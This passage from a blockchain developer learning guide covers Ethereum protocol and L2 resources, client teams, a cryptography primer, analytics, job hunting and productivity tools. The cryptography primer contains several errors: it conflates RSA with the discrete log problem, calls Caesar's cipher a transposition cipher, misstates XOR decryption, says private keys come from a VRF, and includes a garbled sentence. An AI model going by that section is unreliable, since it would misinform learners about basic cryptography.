- [ZK study club playlist](https://www.youtube.com/watch?v=Pnc9J7uQgqs&list=PLj80z0cJm8QHm_9BdZ1BqcGbgE-BEn-3Y) by ZK FM podcast
- Fraud proofs (optimistic rollup tech):
- [The State of Optimistic Rollup](https://medium.com/molochdao/the-state-of-optimistic-rollup-8ade537a2d0f) older overview by Daniel Goldman
- [Inside Arbitrum](https://developer.offchainlabs.com/docs/inside_arbitrum) arbitrum fraud proof
- [Cannon](https://medium.com/ethereum-optimism/cannon-cannon-cannon-introducing-cannon-4ce0d9245a03) optimism fraud proof
- [LibP2P](https://docs.libp2p.io/): the network layer in Eth2, Polkadot, Filecoin and other blockchains.
- [DevP2P](https://github.com/ethereum/devp2p/): the original network layer in Eth1 / execution-layer of ethereum.
- [Whisk: A practical shuffle-based SSLE protocol for Ethereum](https://ethresear.ch/t/whisk-a-practical-shuffle-based-ssle-protocol-for-ethereum/11763)
- [VDF research](https://vdfresearch.org/): verifiable delay function for ethereum and other protocols
- Data Availability Sampling (DAS):
- [DAS in practice](https://notes.ethereum.org/@vbuterin/r1v8VCULP)
- [DAS in full sharding design](https://hackmd.io/@vbuterin/sharding_proposal)
#### L2
Layer-2 scales Layer-1 by increasing capacity without significantly changing the security assumptions of the Layer-2.
Although this does not change L1 itself, it does influence the general scaling design direction,
generally pushing ethereum into a [rollup-centric roadmap](https://ethereum-magicians.org/t/a-rollup-centric-ethereum-roadmap/4698).
Domains:
- Side-chains: [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/sidechains/), [eth org](https://ethereum.org/en/developers/docs/scaling/sidechains/)
- State channels: [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/state-channels/), [eth org](https://ethereum.org/en/developers/docs/scaling/state-channels/)
- Plasma (mostly deprecated): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/plasma/), [eth org](https://ethereum.org/en/developers/docs/scaling/plasma/)
- Rollups [intro by Polynya](https://polynya.medium.com/rollups-data-availability-layers-modular-blockchains-introductory-meta-post-5a1e7a60119d)
- ZK rollups (ZKRUs): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/zk-rollups/), [eth org](https://ethereum.org/en/developers/docs/scaling/zk-rollups)
- Optimistic rollups (ORUs): [EthHub](https://docs.ethhub.io/ethereum-roadmap/layer-2-scaling/optimistic_rollups/), [eth org](https://ethereum.org/en/developers/docs/scaling/optimistic-rollups/)
- Bridges: [eth org intro](https://ethereum.org/en/bridges/)
- L3 / validiums / volitations etc:
- [starkware L3](https://medium.com/starkware/fractal-scaling-from-l2-to-l3-7fe238ecfb4f)
- [Validium eth org intro](https://ethereum.org/en/developers/docs/scaling/validium/)
Refer to [L2beat.com](https://l2beat.com/) for an overview of active L2 scaling solutions.
#### L1
Domains:
- Eth1 / execution layer
- Networking: devp2p
- EVM
- Tx pool
- Sync methods (Fast, Snap, Archive, Beam, Light)
- State DB
- User-facing (JSON RPC, tx tracing, etc.)
- Eth2 / consensus layer
- Networking: libp2p
- Fork-choice
- Attestations / BLS aggregation
- Staking / Validator clients
- Slashings
- Sharding
##### News
Selection of protocol news resources:
- [Week in Ethereum](https://weekinethereumnews.com/): OG weekly news letter
- [Eth2.News](https://eth2.news): eth2 news by Ben Edgington
#### Communication
- [Discord Eth R&D server](https://discord.gg/EyK6HmMcmy)
- [Eth magicians](https://ethereum-magicians.org/), forum for governance / protocol discussion
- [Eth research](https://ethresear.ch/), forum for research discussion
- AllCoreDevs (ACD): [discord channel in R&D](https://discord.gg/S6r6RcWPC3)
- Ethereum Foundation [youtube channel](https://www.youtube.com/c/EthereumFoundation) (streams ACD and Consensus calls)
#### L1 Specifications
##### Execution layer
- [Ethereum Improvement Proposals: EIPs](https://eips.ethereum.org/)
- [Execution APIs](https://github.com/ethereum/execution-apis/)
- [New Execution py-specs](https://github.com/ethereum/execution-specs)
##### Consensus layer
- [Consensus specs](https://github.com/ethereum/consensus-specs)
- [Beacon APIs](https://github.com/ethereum/beacon-APIs), also see [interactive site](https://ethereum.github.io/beacon-APIs/)
- [Annotated specs](https://github.com/ethereum/annotated-spec) by Vitalik Buterin
- [Eth2 book](https://eth2book.info/altair/contents): extended annotated specs with some eth2 history, by Ben Edgington
- Legacy (but good) resources:
- [Proof Of Stake F.A.Q.](https://eth.wiki/en/concepts/proof-of-stake-faqs)
- [Sharding F.A.Q.](https://eth.wiki/sharding/Sharding-FAQs)
- [Ethereum sharding research compendium](https://notes.ethereum.org/@serenity/H1PGqDhpm?type=view)
#### Ethereum core teams
Client teams (those that are open-source), in no particular order:
| Domain | Project | Language | Discord | Docs |
|-------------|--------------------------------------------------------------------------------------------------------------|---------------|----------------------------------------------------------------------------|--------------------------------------------------------------------|
| Eth2 | [Prysm](https://github.com/prysmaticlabs/prysm) | Go | [invite](https://discord.gg/fbHjSdy) | [docs](https://docs.prylabs.network/docs/getting-started/) |
| Eth2 | [Lighthouse](https://github.com/sigp/lighthouse) | Rust | [invite](https://discord.gg/uC7TuaH) | [docs](https://lighthouse-book.sigmaprime.io/) |
| Eth2 | [Lodestar](https://github.com/ChainSafe/lodestar) | Typescript | [invite](https://discord.gg/Quv3nJX) | [docs](https://chainsafe.github.io/lodestar/) |
| Eth1 + Eth2 | Nimbus [eth2](https://github.com/status-im/nimbus-eth2) and [eth1](https://github.com/status-im/nimbus-eth1) | Nim | [invite](https://discord.gg/YbTCNat) | [docs](https://nimbus.guide/) |
| Eth2 | [Teku](https://github.com/consensys/teku) (Artemis + Harmony) | Java / Kotlin | [invite](https://discord.gg/vZPbTfw) | [docs](https://docs.teku.consensys.net/en/latest/) |
| Eth1 | [Go-ethereum](https://github.com/ethereum/go-ethereum) | Go | [invite](https://discord.gg/nvKEx7QBJc) | [docs](https://geth.ethereum.org/docs/) |
| Eth1 | [Nethermind](https://github.com/NethermindEth/nethermind) | C# | [invite](https://discord.gg/esp8n6W) | [docs](https://docs.nethermind.io/nethermind/) |
| Eth1 | [Besu](https://github.com/hyperledger/besu) | Java | [invite](https://discord.gg/mEm2QcVxFN) | [docs](https://wiki.hyperledger.org/display/BESU/Hyperledger+Besu) |
| Eth1 | [ethereum-JS](https://github.com/ethereumjs/ethereumjs-monorepo) | Javascript | [invite](https://discord.gg/qJJkE3RKUz) | [docs](https://ethereumjs.readthedocs.io/en/latest/) |
| Eth1 | [Erigon](https://github.com/ledgerwatch/erigon) | Go | [Invite-only](https://github.com/ledgerwatch/erigon#erigon-discord-server) | [docs](https://github.com/ledgerwatch/erigon/tree/devel/docs) |
#### Computer science
#### Client development
#### Geth
### MEV searcher
Coming soon.
### Security engineer
WIP
### Cryptography
Cryptography is the backbone of distributed ledgers. No distributed permissionless system is possible without asymmetric cryptography. If you are interested in building decentralized applications, it's essential to understand the wallet generation and transaction signing processes. Both of which rely heavily on underlying cryptographic protocols. Throughout this section, I provide a wide array of information about cryptography.
**DISCLAIMER:** While playing with these algorithms on your own is a great way to learn, you **NEVER** want to use your cryptographic protocols in a production environment. The existing libraries have been well-vetted and battle-tested over many years. Because cryptography is complex by design, attempting to build your cryptographic protocols is incredibly dangerous.
#### What is cryptography
Cryptography is the study of enciphering and deciphering information preserving the privacy of enciphered information.
Modern cryptography is mathematically robust and plays a critical role in securing sensitive information like your bank account numbers and social security number. While the mathematics may seem complex and intimidating, the concepts are graspable even without completely understanding the encryption algorithms.
Cryptography is made up of a collection of primitives which serve as building blocks for different cryptographic protocols. Some examples of cryptogrpahic primitives include hash functions such as sha-256 and md5(a one way map), and verifiable random functions (VRFs). True randomness is extreamly dificult to capture, but mathmaticians have developed a way to construct randomness that is indestinguishable from *true randomness*.
These primitives are used to build more robust tools like ciphers. Ciphers are algorithms used to conceal (encrypt) and decrypt information. The encrypted data is called ciphertext, while the translated information is called plaintext. There are two general categories of ciphers, symmetric ciphers and asymmetric ciphers. We will go into the difference and some examples throughout this section.
#### Symmetric Ciphers
A cipher is symmetric when the same Key used to encrypt information is also used to decrypt information resulting in Key symmetry. A simple example of this is a XOR cipher. To encrypt with an XOR cipher you simply XOR the bits of the key with the bits of the plaintext. To decrypte the cipher text you XOR the same key with the plaintext. I have provided an XOR truth table bellow for convienence.
| A | B | A XOR B |
| -- | - | ------ |
| 0 | 1 | 1 |
| 0 | 0 | 0 |
| 1 | 1 | 0 |
| 1 | 0 | 1 |
**NOTE** this cipher is if the same key is used more then once. See this [article](https://idafchev.github.io/crypto/2017/04/13/crypto_part1.html) for the details
Other examples of symmetric ciphers include the transposition ciphers like [Caesar's Cipher](https://en.wikipedia.org/wiki/Caesar_cipher), and permutation ciphers. Both are easily broken by [frequency analysis](https://en.wikipedia.org/wiki/Frequency_analysis). Most monoalphabetic Symmetric ciphers (one alphabet) are broken with frequency analysis.
There are existing Symmetric ciphers that have not been broken. A good example is the Advanced Encryption Standard or [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard). However, the security of AES relies on having a sufficiently large key size.
Symmetric ciphers are appropriate until you need to send a key over a communication protocol securely. You and the receiving party must share a key to share private information over a secure communication channel. You can see this chicken or the egg problem forming. How do you securely share the Key?
#### Asymmetric Ciphers
The ciphers used today that distributed ledgers rely on are asymmetric ciphers. Asymmetric ciphers address the key exchange problem presented above by using a different key to encrypt information than they do to decrypt information. These keys are known as the public and private key pair. The asymmetric cryptosystem is only possible because of a mathematical relationship between the public and private key pair. The first breakthrough with asymmetric cryptography was the Rivest Shamir Alderman [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)) cipher named after its creators. The security of RSA relies on the fact that factoring large prime numbers is hard, more precisely [the Discrete Log Problem](https://en.wikipedia.org/wiki/Discrete_logarithm). These ciphers allow anyone to encrypt information intended for you with your public key, but only you can decrypt it with your private key.
While RSA was a breakthrough in cryptography, it was computationally not as fast as some of the leading symmetric ciphers at the time. Thus, RSA was used to securely share the symmetric key cipher, after which the symmetric cipher was used. RSA was the state of the art until a curve initially discovered about 2000 years ago by [Dophantus](https://en.wikipedia.org/wiki/Diophantus) was explored for a better approach.
There is an algebraic structure called a [finite field](https://en.wikipedia.org/wiki/Finite_field). In a finite field, the elements in the field obey slightly more abstract rules when compared to arithmetic operators on real numbers. You can define a finite field of rational points on a curve given that you can define multiplication and addition between these points, and the results under these definitions remain rational points on the curve. The class of curves that these fields have been defined over for asymmetric cryptography are called elliptic curves and fallow the general equation of y<sup>2</sup> = x<sup>3</sup> + ax + b where a and b are constants.
How does this relate to the discrete log problem? It turns out that the discrete log problem in the finite field of an elliptic curve is preserved and still very difficult. Thus we can construct similar primitives like those constructed in RSA over fields of elliptic curves. The advantage over RSA is that they are relatively fast, so more than 90% of all internet traffic year to date is encrypted with elliptic curves.
Detail on the parameters for curve p256 can be read about [here](https://csrc.nist.gov/csrc/media/events/workshop-on-elliptic-curve-cryptography-standards/documents/papers/session6-adalier-mehmet.pdf). If you are curious about how the addition and multiplication operators are defined in the finite fields over these curves, I recommend this [reading](https://hackernoon.com/what-is-the-math-behind-elliptic-curve-cryptography-f61b25253da3).
##### Digital Signatures
We can create a new cryptographic primitive called a digital signature with asymmetric cryptography. For example, you want to prove that you have the corresponding private key to a public key (to authorize a transaction). A simple way to think about this is what if you encrypt information with your private key and allow anyone to use your public key to decrypt this information. The Elliptic Curve Digital Signature algorithm [ECDSA](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm) is slightly more complex and requires you to have a vital source of randomness as one of the parameters. Nonetheless, this is how you authorize (send) a transaction from your wallet. You sign the transaction with your private key (revealing no information about the private key) to prove you have the authority to authorize your transaction. You can now see how anyone with your private key can authorize transactions on your behalf. *Not your keys, not your crypto*
##### Wallet generation in Ethereum.
To generate a wallet address in Ethereum, you first randomly generate a 256 bit private Key with a verifiably random function (VRF). Then you use elliptic curve cryptography to generate the corresponding 256-bit public Key. Finally, you hash the 256 bit public Key with [keccak256](https://keccak.team/keccak.html) to a 160-bit address. With a 256-bit key, the odds of someone generating a private key already in use (a collision) is 2<sup>-256</sup> and computationally unfeasible.
### Protocol development
Coming soon.
### Blockchain data analytics (provisional)
This section will primarily cover EVM based chains as of now. Getting started with data analytics in web3 is really easy, because everything is standardized, there are tons of visualization/explorer tools, and most of the existing analysis in the space is fully open-source. No matter your background and experience level, I recommend starting your analytics journey with SQL - it's the easiest to work with and share by far.
###### Resources for getting started:
- [Guide](https://ath.mirror.xyz/w2cxg5OP1OEcqvSgsEjSSyKRJhPmam0w-fXGogiG-8g) to how to think about web3 data, the tools you'll need across the data stack, and some skills/roles that are common in the space.
- For basics of both SQL and Ethereum, start [here](https://towardsdatascience.com/your-guide-to-basic-sql-while-learning-ethereum-at-the-same-time-9eac17a05929)
- Once you're comfortable with those, start with the intermediate material [here](https://towardsdatascience.com/your-guide-to-intermediate-sql-while-learning-ethereum-at-the-same-time-7b25119ef1e2)
- If you're comfortable with contract tables and want to dive more into the base data tables (transactions, logs, traces) then [check out this](https://ath.mirror.xyz/mbR1n_CvflL1KIKCTG42bnM4HpfGBqDPNndH8mu2eJw) complete break down of an Ethereum transaction (including proxy patterns).
- A lot of event and call data analytics relies on using aggregations to get to the most current state. Skip that noise and go to [storage and state data analysis](https://ath.mirror.xyz/lcZzeBcfpmfQlIHqUBmNAmv5EeVfNBGmr-S7mkWcuyo) when you're ready (this will require you to learn some solidity)
- To fully dive in and become a web3 analyst, check out the [OurNetwork Learn 30 day data course](https://ournetwork.mirror.xyz/gP16wLY-9BA1E_ZuOSv1EUAgYGfK9mELNza8cfgMWPQ) with videos that cover a multitude of topics.
- Once you're ready to start applying to roles, one place to start is [applying to this talent board](https://ilemi.pallet.com/talent) for a chance to have 1:1 help finding a role.
###### Beginner friendly orgs to start getting involved in:
- [MetricsDAO](https://discord.com/invite/metrics) (runs workshops and bounties weekly)
- [Index Coop](https://discord.com/invite/BcqYxdNC3R) (lots of broad protocol analytics generally to learn from)
- [Dune Wizards](https://discord.com/invite/ErrzwBz) (lots of helpers, and some harder bounties)
- [Flipside Gunslingers](https://discord.com/invite/ZmU3jQuu6W) (lots of helpers, and a more focus on cross-chain work like Harmony, Terra, Solana, etc)
###### Some data feeds to follow to keep updated on newest analysis in the space:
- [Dune Digest & Podcast](https://twitter.com/DuneAnalytics/status/1502358536432537607)
- [OurNetwork Weekly Data Newsletter](https://ournetwork.substack.com/)
<more to come soon!>
## Application-based development
Coming soon.
### DeFi
WIP
#### Lending/Borrowing
#### DEXs
#### Yield aggregators
### MEV
Coming soon.
#### The Dark Forest
#### Frontrunning
#### Backrunning
### Creator economy
Coming soon.
### Gaming development
Coming soon.
### Coordination / Public Goods
Coming soon.
## Getting a job
Once you start having a solid foundational skillset within blockchain development you can start looking for junior positions in your area of interest. One of the best parts of web3 is that many projects have open-source codebases which make it much easier to contribute to. There are various structures in web3 that allow a developer to get paid for their work, some of them are:
- working for a company that is building a web3 product
- getting grants from Gitcoin or several different DAOs
- being a DAO core contributor and getting paid with bounties
The easiest way to find a job is being active in the social platforms of the projects you'd like to be hired at or contribute to, e.g. if you want to become a smart contract developer at Uniswap, then talk to the team on Discord, suggest them new features, implement mockups, apply for a grant and if you are good enough someone will notice and try to hire you to work on it full-time within the DAO itself or for Uniswap Labs which is the core team leading the smart contract development efforts. The most important thing is to show initiative, being proactive and openly talking about helping. If you come across something interesting also don't forget to post it on Twitter or on Telegram.
In order to find interesting projects to work for, web3 devs look at Twitter as it's the place where everything unfolds and where every single project lives. If you build out a reputation as a good blockchain developer, then you'll start getting DMs from interesting people and projects as there is an extreme lack of talent in the space and insatiable demand for good developers.
### Portfolio
In order to become a good job candidate, it is almost imperative to have a portfolio of projects that you've built in order to showcase the skills you have, the technologies you use and your thought processes behind solving different problems. I.e. if you are interested in building DeFi applications then you can showcase that by writing a demo of an AMM, a yield aggregator, a money market, etc. The more high quality demo projects you have the better as these will act as valuable information for teams looking to hire. The most popular way to showcase your projects is to publish them publicly on [GitHub](https://github.com/).
If you don't know what to build you can look at different problems different projects are facing, try solving one of them and publishing the solution as a public repo on GitHub. You can build demo projects from sites like [SpeedRunEthereum](https://speedrunethereum.com/) using templates like scaffold-eth, and much more.
### Job boards
The two most used platforms to find crypto/web3 jobs are Twitter and a few select job boards. The main job boards used by recruiters and workers are:
- [crypto.jobs](https://crypto.jobs/)
- [cryptojobslist.com](https://cryptojobslist.com/)
- [bankless job pallet](https://bankless.pallet.com/jobs)
- [web3 career](https://web3.career/)
- [cryptocurrencyjobs](https://cryptocurrencyjobs.co/)
- [web3 pallet](https://web-3.pallet.xyz/)
- [useweb3 jobs](https://useweb3.xyz/jobs)
- [web3 board](https://web3board.io/)
- [defi jobs](https://defi.jobs/)
### Twitter
Twitter is the place to find a blockchain development job, LinkedIn is rarely used for hiring talent in the space, although it's not too uncommon either. As most of the web3/crypto culture resides on Twitter, it is a natural place for developers, founders, creators and users to hangout together. The more value you provide to the community, the more following you'll get, therefore the more outreach as a developer. All teams are thirsty for good developers and so the more relevant followers you have, the more chances you'll get of being discovered by a team looking to hire a blockchain developer in your field of expertise. Building up your Twitter reputation can propel you forwards more than you'd expect, a lot of friendships, partnerships and collaborations have been initiated through Twitter and it is currently the place to account for social value (clout) in the space.
If you manage to demonstrate mastery of any given skill within web3, then you are guaranteed a position pretty much anywhere as all teams are looking for talent. If you are just starting out, but you show a strong drive and initiative to learn then many teams will ask to take you under their wing in order to upscale your skills by getting your hands dirty and learning while building as you go. By being active on relevant social platforms like Twitter, Discord and Telegram and socializing with the right people, finding a job becomes relatively easy as everyone is looking to hire talent.
## Mastery
### Introduction
This mastery section will discuss several soft skills that will help you master any skillset. It is vital not to get stuck in the wrong mindset when learning the skills required to become a great blockchain developer. It is not only about going to a few websites, reading course material, working out some problems, and building applications. Various soft skills will assist you during your journey, which often go unnoticed or are ignored.
### Learning how to learn
Many people focus on the skillsets they need to learn and all the information they need to consume. Rarely do people stop to think twice about how to learn effectively so that every minute spent learning any course material yields maximum retention and the time effort is minimized.
This section is inspired by Barbara Oakley's book Learning How to Learn.
#### Lesson's from the book
These notes are extracted from [this summary](https://www.allencheng.com/learning-how-to-learn-book-summary-barbara-oakley-terrence-sejnowski-et-al/) of the book. I strongly recommend [reading the book](https://www.amazon.com/Learning-How-Learn-Spending-Studying/dp/0143132547) or taking [Barbara Oakley's Coursera course](https://www.coursera.org/learn/learning-how-to-learn).
1. When You Find Yourself Struggling To Solve A Problem Or Learn Anything New, Try To Relax For A Few Minutes. And Then Try Again Later.
2. Procrastination gives you instant pleasure, but it hurts you long-term and makes you highly unproductive.
3. Think in metaphors to learn faster.
4. Learning has no age. Even adults in their 40s or 50s can learn new stuff!
5. Sleeping is important for your brain connections to become stronger and sturdier.
6. Use memory palaces to remember cold hard facts
7. Excercise is good not only for your body but also for your brain
8. Neurons are sophisticated tiny computers in your brain
9. Focus on different aspects while studying a new subject
#### More resources on learning how to learn
- [Barbara Oakley's Coursera course](https://www.coursera.org/learn/learning-how-to-learn)
- [How to Learn Anything FASTER - Ali Abdaal](https://www.youtube.com/watch?v=unityETmypk&ab_channel=AliAbdaal)
### How to take notes efficiently
When you constantly have to consume lots of learning materials, it is tough to learn it effectively and in a way that your brain can retain it for longer. Suppose you want to master any given topic. It is good to write notes as you're learning, especially in a digital format that you can easily query and reminisce yourself about the material. If you write practical notes, your brain is forced to think about the subject and hand and more easily synthesizes the ideas and learnings.
Content retention is also heightened when you take good notes since your recollection of a subject is better when focusing on the essential parts of any given learning material.
A great book to improve at notetaking is:
**How to Take Smart Notes: One Simple Technique to Boost Writing, Learning and Thinking – for Students, Academics and Nonfiction Book Writers**
by Sönke Ahrens
[Amazon link](https://www.amazon.com/gp/product/B09V5M8FR5/ref=x_gr_w_bb_sin?ie=UTF8&tag=x_gr_w_bb_sin-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=B09V5M8FR5&SubscriptionId=1MGPYB6YW3HWK55XCGG2)
The book is inspired by the german notetaking method [*zettelkasten*](https://en.wikipedia.org/wiki/Zettelkasten).
**Core principles of How to Take Smart Notes:**
1. Writing is not the outcome of thinking; it is the medium in which thinking takes place
2. Do your work as if writing is the only thing that matters
3. Nobody ever starts from scratch
4. Our tools and techniques are only as valuable as the workflow
5. Standardization enables creativity
6. Our work only gets better when exposed to high-quality feedback
7. Work on multiple, simultaneous projects
8. Organize your notes by context, not by topic
9. Always follow the most interesting path
10. Save contradictory ideas
If you don't want to read the book, you can read a summary of it and try to apply its principles to your personal notetaking approach. - [Link](https://fortelabs.co/blog/how-to-take-smart-notes/)
Next, let's explore different notetaking applications and what they are suitable for.
#### Notion
![](https://images.ctfassets.net/spoqsaf9291f/3URR6bnGgyuzpzRNwtgecf/e37c7dcfabd322a81f926cfffbc7e952/Screen_Shot_2021-09-20_at_6.17.28_PM.png)
[Notion](https://www.notion.so/) is a great notetaking tool for all sorts of things. Whether it is taking notes on a topic that you are trying to master, managing complex projects with your team, creating a knowledge base, managing your daily tasks, and much more.
##### How to use Notion
Here are some external resources to learn how to use Notion. Feel free to submit a pull request to the guide or the devpill.me site with suggestions on more resources.
- [10X your Productivity as a Developer with Notion - Clever Programmer](https://www.youtube.com/watch?v=9PWaOgql-Ts)
- [Notion Mastery - Marie Poulin](https://www.youtube.com/playlist?list=PLpzKoBl909Y1s8hS5QpSlamyGqzmMqzDZ)
- [Keep productive - YouTube](https://www.youtube.com/channel/UCYyaQsm2HyneP9CsIOdihBw)
- [Notion](https://www.youtube.com/channel/UCoSvlWS5XcwaSzIcbuJ-Ysg)
- [Civic's unplugged Notion use cases](https://cucrew.notion.site/How-We-Use-Notion-at-Civics-Unplugged-9b4ec2ef829d4b3cb88335cae712fc56)
Self-Development use case:
- [Gary Sheng's Leadership Blueprint](https://garysbrain.notion.site/garysbrain/Gary-s-Leadership-Blueprint-3020aee8549346c49c2495f5f21dec04)
#### Roam Research
[Roam Research](https://roamresearch.com/) is a notetaking app that leverages the structure of graphs to synthesize and connect different notes and pieces of knowledge by referencing concepts across notes. You can link different ideas in both directions and create mind maps for anything you learn.
![roam research](https://lawsonblake.com/content/images/2020/08/Roam_Page-2.JPG)
Roam research is a subscription-based paid application ( `$ '15 per month or `$`165 per year). You can also apply for a scholarship to use Roam for free if you are a researcher, under 22, or experiencing financial distress ([link to apply](https://roamresearch.typeform.com/to/Y8ggm3gR?typeform-source=roamresearch.com)).
It is a great way to create a structure for any learning material, whether it is about Solidity, MEV, DeFi, some protocol design, public goods, or anything else. It is a great way to reference concepts and check where else you have referenced them, and expand on each note you take.
##### How to use Roam Research
- [Beginner's Guide to Roam Research - Keep Productive](https://www.youtube.com/watch?v=A_7_8AAkV7M)
- [This Note-Taking App is a Game Changer - Roam Research by Thomas Frank](https://www.youtube.com/watch?v=vxOffM_tVHI&ab_channel=ThomasFrank)
- [How to Take Better Notes With Roam Research - Lawson Blake](https://lawsonblake.com/roam-research-review/)
#### Obsidian
![Obsidian](https://obsidian.md/images/screenshot.png)
[Obsidian](https://obsidian.md/) is a free alternative to Roam research that hosts your graphs locally. Some add-on features or licenses can be paid for as a subscription or one-time payment for added functionality. They will also soon release hosted graphs.
##### How to use Obsidian
- [Your Beginner's Guide to Obsidian](https://www.keepproductive.com/blog/obsidian-beginners-guide)
#### Inkdrop
![Inkdrop](https://beta.docs.inkdrop.app/og-cover-image.jpg)
[Inkdrop](https://www.inkdrop.app/) is a Markdown notetaking application that is highly extensible and focuses on developers. I use it to write all of my articles and the [devpill.me](https://devpill.me/) guide and my [article on L2s](https://dcbuilder.mirror.xyz/QX_ELJBQBm1Iq45ktPsz8pWLZN1C52DmEtH09boZuo0), and some other pieces.
I use the Vim extension for writing using [Vim keybindings](https://github.com/vim/vim); I also use the LaTeX extension to occasionally write math equations and some other plugins for modifying how the application looks.
There is a 30-day free trial for the application. Otherwise, it costs `$ '50 per year or `$`6 per month.
#### Others
For more applications, check out [this article](https://collegeinfogeek.com/best-note-taking-apps/) from College Info Geek comparing different notetaking apps
### Mentorship
Having guidance is extremely important to grow as rapidly as possible and make the most effective use of your time. I want to share some of the lessons I have learned over the past four years of researching blockchain development and web3. I don't want new developers to feel as overwhelmed by the number of possibilities and lack of structured guidance as I did.
In the crypto and broader web3 ecosystems, thought leaders spearhead different missions, values, and goals and drive the industry forward. When you are just starting out, following these leaders and analyzing how they reached their position is an excellent way to understand what you need to do to achieve your own goals within a particular field. If you are interested in creating useful DeFi primitives, then you have to analyze exemplary founders and builders of current as well as the up and coming DeFi protocols; good examples include [Hayden Adams](https://twitter.com/haydenzadams) (Uniswap), [Stani Kulechov](https://twitter.com/StaniKulechov) (Aave), [Robert Leshner](https://twitter.com/rleshner) (Compound), [@scupytrooples](https://twitter.com/scupytrooples) (Alchemix), etc.
#### EthernautDAO
EthernautDAO is a community of builders that tries to convert developers from other fields into blockchain developers through mentorship programs. There are two main types of members in EtheurnautDAO: mentors and mentees (students). Mentors come from different established protocols, DAOs, projects, and companies in the industry and are looking to train and hire skilled developers. The process is relatively simple: a mentor posts an opening for a specific type of mentorship. Students apply. If they get accepted, they get mentorship and often either compensation or the chance to get hired by the company the mentor belongs to.
#### Twitter
The leading platform for news, discourse, education, and interaction within the web3 space is Twitter. Almost everyone interacts on Twitter, and so as someone looking to learn and get mentorship, it is a great place to try and get hired (take a look at the [Getting a job section](https://www.devpill.me/docs/getting-a-job/introduction/)) and accrue [social capital](https://www.devpill.me/docs/social-capital/introduction/). As you build a portfolio that showcases your skills, it will act as your reputation in the space. You can leverage that reputation on Twitter to start working on different projects (getting a job) or interacting with skilled individuals who are generally very willing to help people learn and become better (great to get mentorship).
#### Development bootcamps
Another option for getting valuable guidance is finding a community of people going through the same challenges you are. You will gain access to experienced builders, excellent educational materials, and more development bootcamps and e-learning platforms like the ones listed below.
A non-exhaustive list of learning platforms:
- [Buildspace](https://buildspace.com/) (free)
- [Cadena] (https://cadena.dev/) (free)
- [Encode club](https://www.encode.club/encode-bootcamps) (paid)
- [Consensys Academy](https://consensys.net/academy/bootcamp/) (expensive bootcamp)
- [BuidlGuidl](https://buidlguidl.com/) (free)
- [Learn Web3](https://www.learnweb3.io/) (free)
- Affiliated (I, dcbuilder, am an advisor):
- [Artemis](https://www.artemis.education/) (free / income sharing)
- [Crystalize](https://crystalize.dev/) (income sharing)
### Mastery
Mastery of a craft can only be achieved when individuals hone their skills to the utmost and become competent experts. To acquire knowledge of a specific skillset, the individual needs to devote a lot of time and concentrated effort to learn as many intricacies, nuances, and details about their craft. They also need to assimilate that information into their abilities to wield the art necessary to perform it. They need to constantly keep up with the pace of development within that craft to retain their state-of-the-art skills. The context of blockchain development involves:
Keeping up with the current standard development stacks.
Looking into newly emerging technologies.
Developing a deep understanding of the field to critically assess the pros and cons of using a specific technology or architecture.
Many principles behind mastery and the journey of achieving peak human performance are studied in various areas of study like neurology (for learning-related matters), psychology, physiology, social sciences, self-development studies, and more.
A good entry book that has remained relevant for decades is Robert Green's book 'Mastery'. It details the steps that the most capable people have abided by to achieve greatness and mastery of their craft throughout human history. You can find a good summary of the book's principles [here](https://www.nateliason.com/notes/mastery-robert-greene).
The main sections of the book are:
1. Discovering Your Calling
2. Submit to Reality: The Ideal Apprenticeship
3. Absorb the Master's Power: The Mentor Dynamic
4. See People as they Are: Social Intelligence
5. Awaken the Dimensional Mind: The Creative-Active
6. Fuse the Intuitive with the Rational: Mastery
Becoming a master of blockchain development or its specializations is a never-ending process. However, the possibilities for what you can create are endless, and all of its skillsets are highly valuable and sought after.
I'm personally excited about what the masters of the future will be able to build and how that will enable the future of human coordination, public goods, and regenerative crypto-economics.
#### Rationality
Rationality is the quest of trying to find the truth systematically. A great book about rationality is '[Rationality: From AI to Zombies](https://intelligence.org/rationality-ai-zombies/)' by Eliezer Yudkowsky (thank you, [Rai](https://twitter.com/0xRaino), for the recommendation).
From the book: "When we talk about rationality, we're generally talking about either epistemic rationality (systematic methods of finding out the truth) or instrumental rationality (systematic methods of making the world more like we would like it to be). We can discuss these in the forms of probability theory and decision theory, but this doesn't fully cover the difficulty of being rational as a human. There is a lot more to rationality than just the formal theories."
The book is comprised of 6 smaller sections:
- Book I: Map and Territory
- Book II: How to Actually Change Your Mind
- Book III: The Machine in the Ghost
- Book IV: Mere Reality
- Book V: Mere Goodness
- Book VI: Becoming Stronger
You can read the sections sequentially as they originally come from blogposts he wrote. Each section goes through different areas of rationality.
### Time management
Time management is vital to becoming an efficient developer, especially in crypto / web3, where there are so many distractions and shiny objects that it is hard to focus on essential tasks.
#### Planning
Planning your days ahead of time is essential to maximize productivity as a developer, especially if you are a freelancer or don't have a robust synchronous structure within your organization. Since many web3 developers work remotely and teams coordinate asynchronously using tools like GitHub, Zoom / Google Meets, etc. It is essential to book the times you will spend working on a particular task or area.
I'd recommend planning your day the day before and filling all the necessary tasks as you need them. You will get better at planning the more you do it, as you'll be able to see how it works for you and what things you need to polish out.
I try to schedule everything, from travels to bookings, personal affairs, periods for exercising, eating, reading, learning, working, events, calls, meetings, etc. I spent way too much time procrastinating and just going through the motions, and if I had a system to use my time efficiently, I would not have lost so much time in vain.
I've recently started using [Cron](https://cron.com/), a calendar interface that can hook up to Google accounts. The application aggregates all of your connected Google accounts' calendars. It sends notifications for meetings early, the UI/UX is impressive, booking new events is very intuitive, and it allows you to send invites from any account.
For scheduling meetings, I recommend using [Calendly](https://calendly.com/) or similar services that allow you to give other people links with pre-filled slots with your availability. The people you want to meet with can use to book a specific time with you; the event will subsequently appear in your calendar app of choice.
To get deeper into planning/scheduling and developing high performance, I recommend reading these two books, which are my personal favorites:
- [The Power of Habit](https://www.shortform.com/summary/the-power-of-habit-summary-charles-duhigg?utm_source=google&utm_medium=cpc) - Charles Duhigg
- [High Performance Habits](https://www.amazon.com/High-Performance-Habits-Extraordinary-People/dp/1401952852) - Brendon Burchard
